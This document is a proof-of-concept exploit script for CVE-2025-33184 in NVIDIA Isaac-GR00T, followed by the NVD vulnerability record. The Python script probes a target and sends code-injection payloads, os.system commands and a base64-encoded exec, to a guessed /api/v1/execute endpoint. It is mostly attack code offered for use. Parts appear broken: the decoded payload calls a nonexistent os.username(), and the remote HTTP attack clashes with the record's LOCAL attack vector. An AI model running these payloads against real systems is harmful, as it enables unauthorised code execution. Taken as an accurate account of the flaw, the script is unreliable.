CVE-2025-33184

# CVE-2025-33184 PoC - NVIDIA Isaac-GR00T Code Injection # This PoC demonstrates the code injection vulnerability in NVIDIA Isaac-GR00T Python component import requests import json def exploit_isaac_gr00t(target_ip, target_port=5000): """ Exploit CVE-2025-33184 - Code Injection in NVIDIA Isaac-GR00T Prerequisites: Low-privilege access to the system running Isaac-GR00T """ # Malicious payload that attempts to execute arbitrary code # This exploits the unsafe use of eval() or exec() in Python component malicious_payload = { "command": "__import__('os').system('id > /tmp/pwned.txt')", "input_data": "'; exec(__import__('base64').b64decode('aW1wb3J0IG9zCnVzZXI9b3MudXNlcm5hbWUoKQppZCh1c2VyKQ==')) #" } # Target endpoint (may vary based on Isaac-GR00T configuration) url = f"http://{target_ip}:{target_port}/api/v1/execute" try: response = requests.post(url, json=malicious_payload, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text}") # Check if exploit was successful if response.status_code == 200: print("[+] Payload delivered successfully") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_vulnerability(target_ip): """ Verify if the target is vulnerable to CVE-2025-33184 """ # Check for exposed Python component endpoints check_url = f"http://{target_ip}:5000/api/v1/status" try: response = requests.get(check_url, timeout=5) if response.status_code == 200: print("[!] Target appears to be running Isaac-GR00T Python component") return True except: pass return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-33184.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 5000 print(f"[*] Testing target: {target}:{port}") if verify_vulnerability(target): exploit_isaac_gr00t(target, port)

{"cve": {"id": "CVE-2025-33184", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:00.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33184", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5725", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33184", "source": "[email protected]"}]}}